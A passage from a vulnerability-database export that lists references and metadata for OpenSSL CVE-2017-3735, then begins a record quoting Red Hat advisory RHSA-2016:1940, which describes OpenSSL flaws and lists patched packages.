"db": "VULMON", "id": "CVE-2017-3735" }, { "db": "JVNDB", "id": "JVNDB-2017-007691" }, { "db": "CNNVD", "id": "CNNVD-201708-1172" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007691" }, { "db": "NVD", "id": "CVE-2017-3735" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.securityfocus.com/bid/100515" }, { "trust": 2.0, "url": "https://www.openssl.org/news/secadv/20170828.txt" }, { "trust": 2.0, "url": "https://github.com/openssl/openssl/commit/068b963bb7afc57f5bdd723de0dd15e7795d5822" }, { "trust": 1.9, "url": "https://access.redhat.com/errata/rhsa-2018:3221" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201712-03" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2018:3505" }, { "trust": 1.7, "url": "https://www.openssl.org/news/secadv/20171102.txt" }, { "trust": 1.7, "url": "https://www.debian.org/security/2017/dsa-4018" }, { "trust": 1.7, "url": "https://www.debian.org/security/2017/dsa-4017" }, { "trust": 1.7, "url": "https://security.netapp.com/advisory/ntap-20171107-0002/" }, { "trust": 1.7, "url": "https://security.netapp.com/advisory/ntap-20170927-0001/" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1039726" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2017-14" }, { "trust": 1.7, "url": "https://security.freebsd.org/advisories/freebsd-sa-17:11.openssl.asc" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2017-15" }, { "trust": 1.7, "url": "https://support.apple.com/ht208331" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 1.7, "url": "https://lists.debian.org/debian-lts-announce/2017/11/msg00011.html" }, { "trust": 1.7, "url": "https://usn.ubuntu.com/3611-2/" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" }, { "trust": 1.7, "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "trust": 1.7, "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "trust": 1.7, "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3735" }, { "trust": 1.0, "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-3735" }, { "trust": 0.8, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-024-02" }, { "trust": 0.6, "url": "https://www.suse.com/support/update/announcement/2019/suse-su-201914246-1.html" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10887987" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10887995" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10887989" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10887985" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10887991" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10888379" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10886247" }, { "trust": 0.6, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10990" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2536/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/77010" }, { "trust": 0.6, "url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10794451" }, { "trust": 0.6, "url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10886247" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2267/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.4645/" }, { "trust": 0.6, "url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10887987" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.0095/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.1967/" }, { "trust": 0.6, "url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10888379" }, { "trust": 0.5, "url": "https://access.redhat.com/security/cve/cve-2017-3735" }, { "trust": 0.3, "url": "https://github.com/openssl/openssl/pull/4276" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1486144" }, { "trust": 0.3, "url": "https://www.openssl.org/news/vulnerabilities.html#y2016" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10211" }, { "trust": 0.3, "url": "https://www.symantec.com/security-center/network-protection-security-advisories/sa157" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory24.asc" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0739" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2018-0495" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2018-0739" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2018-0737" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0737" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2018-0732" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0495" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0732" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3736" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/3475-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-19-024-02" }, { "trust": 0.1, "url": "https://tools.cisco.com/security/center/viewalert.x?alertid=56174" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-13988" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14682" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-14681" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-1060" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14680" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16837" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14679" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-13988" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1061" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12384" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2017-1000050" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-9396" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-1000050" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-10846" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10768" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-1061" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-14680" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-17456" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-1000805" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10767" }, { "trust": 0.1, "url": "https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-12910" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-10768" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10845" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1060" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-9262" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-10767" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000805" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10733" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10844" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-10845" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-16837" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-17456" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10846" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-12384" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-9262" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-14679" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2017-18267" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-10733" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18267" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12910" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14681" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-14682" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-10844" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9396" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/usn/usn-3611-1" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/usn/usn-3611-2" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13860" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13869" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13875" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13878" }, { "trust": 0.1, "url": "https://support.apple.com/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13867" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13855" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13858" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13868" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13872" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13826" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-9798" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13844" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13848" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13865" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13833" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-1000254" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13847" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13862" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13883" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13871" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13876" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.6_release_notes/index" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.9" }, { "trust": 0.1, "url": "https://www.ubuntu.com/usn/usn-3475-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.23" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu11.3" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu13.2" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3737" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3737" }, { "trust": 0.1, "url": "https://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3736" }, { "trust": 0.1, "url": "https://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3738" }, { "trust": 0.1, "url": "https://nvd.nist.gov/nvd.cfm?cvename=cve-2017-3735" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3738" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." } ], "sources": [ { "db": "VULMON", "id": "CVE-2017-3735" }, { "db": "BID", "id": "100515" }, { "db": "JVNDB", "id": "JVNDB-2017-007691" }, { "db": "PACKETSTORM", "id": "150193" }, { "db": "PACKETSTORM", "id": "147233" }, { "db": "PACKETSTORM", "id": "145270" }, { "db": "PACKETSTORM", "id": "150049" }, { "db": "PACKETSTORM", "id": "144899" }, { "db": "PACKETSTORM", "id": "145423" }, { "db": "CNNVD", "id": "CNNVD-201708-1172" }, { "db": "NVD", "id": "CVE-2017-3735" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2017-3735" }, { "db": "BID", "id": "100515" }, { "db": "JVNDB", "id": "JVNDB-2017-007691" }, { "db": "PACKETSTORM", "id": "150193" }, { "db": "PACKETSTORM", "id": "147233" }, { "db": "PACKETSTORM", "id": "145270" }, { "db": "PACKETSTORM", "id": "150049" }, { "db": "PACKETSTORM", "id": "144899" }, { "db": "PACKETSTORM", "id": "145423" }, { "db": "CNNVD", "id": "CNNVD-201708-1172" }, { "db": "NVD", "id": "CVE-2017-3735" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-28T00:00:00", "db": "VULMON", "id": "CVE-2017-3735" }, { "date": "2017-08-28T00:00:00", "db": "BID", "id": "100515" }, { "date": "2017-09-29T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007691" }, { "date": "2018-11-06T21:04:36", "db": "PACKETSTORM", "id": "150193" }, { "date": "2018-04-18T20:05:17", "db": "PACKETSTORM", "id": "147233" }, { "date": "2017-12-08T10:11:11", "db": "PACKETSTORM", "id": "145270" }, { "date": "2018-10-31T00:56:45", "db": "PACKETSTORM", "id": "150049" }, { "date": "2017-11-06T22:24:00", "db": "PACKETSTORM", "id": "144899" }, { "date": "2017-12-15T14:15:17", "db": "PACKETSTORM", "id": "145423" }, { "date": "2017-08-28T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1172" }, { "date": "2017-08-28T19:29:00", "db": "NVD", "id": "CVE-2017-3735" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-07-20T00:00:00", "db": "VULMON", "id": "CVE-2017-3735" }, { "date": "2018-01-18T06:00:00", "db": "BID", "id": "100515" }, { "date": "2019-07-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007691" }, { "date": "2022-03-10T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1172" }, { "date": "2021-07-20T23:15:00", "db": "NVD", "id": "CVE-2017-3735" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "144899" }, { "db": "CNNVD", "id": "CNNVD-201708-1172" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL Vulnerabilities in incorrect certificate text", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007691" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201708-1172" } ], "trust": 0.6 } }
var-201606-0477
Vulnerability from variot
The dsa_sign_setup function in crypto/dsa/dsa_ossl.c in OpenSSL through 1.0.2h does not properly ensure the use of constant-time operations, which makes it easier for local users to discover a DSA private key via a timing side-channel attack. OpenSSL is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information. This may aid in further attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: openssl security update Advisory ID: RHSA-2016:1940-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html Issue date: 2016-09-27 CVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 CVE-2016-2180 CVE-2016-2181 CVE-2016-2182 CVE-2016-6302 CVE-2016-6304 CVE-2016-6306 =====================================================================
- Summary:
An update for openssl is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.
Security Fix(es):
-
A memory leak flaw was found in the way OpenSSL handled TLS status request extension data during session renegotiation. A remote attacker could cause a TLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory, if it enabled OCSP stapling support. (CVE-2016-6304)
-
It was discovered that OpenSSL did not always use constant time operations when computing Digital Signature Algorithm (DSA) signatures. (CVE-2016-2178)
-
It was discovered that the Datagram TLS (DTLS) implementation could fail to release memory in certain cases. A malicious DTLS client could cause a DTLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory. (CVE-2016-2179)
-
A flaw was found in the Datagram TLS (DTLS) replay protection implementation in OpenSSL. A remote attacker could possibly use this flaw to make a DTLS server using OpenSSL to reject further packets sent from a DTLS client over an established DTLS connection. (CVE-2016-2181)
-
An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec() function. An attacker able to make an application using OpenSSL to process a large BIGNUM could cause the application to crash or, possibly, execute arbitrary code. (CVE-2016-2182)
-
A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)
This update mitigates the CVE-2016-2183 issue by lowering priority of DES cipher suites so they are not preferred over cipher suites using AES. For compatibility reasons, DES cipher suites remain enabled by default and included in the set of cipher suites identified by the HIGH cipher string. Future updates may move them to MEDIUM or not enable them by default.
-
An integer underflow flaw leading to a buffer over-read was found in the way OpenSSL parsed TLS session tickets. A remote attacker could use this flaw to crash a TLS server using OpenSSL if it used SHA-512 as HMAC for session tickets. (CVE-2016-6302)
-
Multiple integer overflow flaws were found in the way OpenSSL performed pointer arithmetic. A remote attacker could possibly use these flaws to cause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)
-
An out of bounds read flaw was found in the way OpenSSL formatted Public Key Infrastructure Time-Stamp Protocol data for printing. An attacker could possibly cause an application using OpenSSL to crash if it printed time stamp data from the attacker. (CVE-2016-2180)
-
Multiple out of bounds read flaws were found in the way OpenSSL handled certain TLS/SSL protocol handshake messages. A remote attacker could possibly use these flaws to crash a TLS/SSL server or client using OpenSSL. (CVE-2016-6306)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183. Upstream acknowledges Shi Lei (Gear Team of Qihoo 360 Inc.) as the original reporter of CVE-2016-6304 and CVE-2016-6306; and Karthikeyan Bhargavan (Inria) and GaA<<tan Leurent (Inria) as the original reporters of CVE-2016-2183.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase 1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation 1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio() 1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec() 1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection 1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) 1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer 1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks 1377594 - CVE-2016-6306 openssl: certificate message OOB reads 1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
ppc64: openssl-1.0.1e-48.el6_8.3.ppc.rpm openssl-1.0.1e-48.el6_8.3.ppc64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm openssl-devel-1.0.1e-48.el6_8.3.ppc.rpm openssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm
s390x: openssl-1.0.1e-48.el6_8.3.s390.rpm openssl-1.0.1e-48.el6_8.3.s390x.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm openssl-devel-1.0.1e-48.el6_8.3.s390.rpm openssl-devel-1.0.1e-48.el6_8.3.s390x.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm openssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm openssl-static-1.0.1e-48.el6_8.3.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm openssl-perl-1.0.1e-48.el6_8.3.s390x.rpm openssl-static-1.0.1e-48.el6_8.3.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.3.i686.rpm openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-perl-1.0.1e-48.el6_8.3.i686.rpm openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
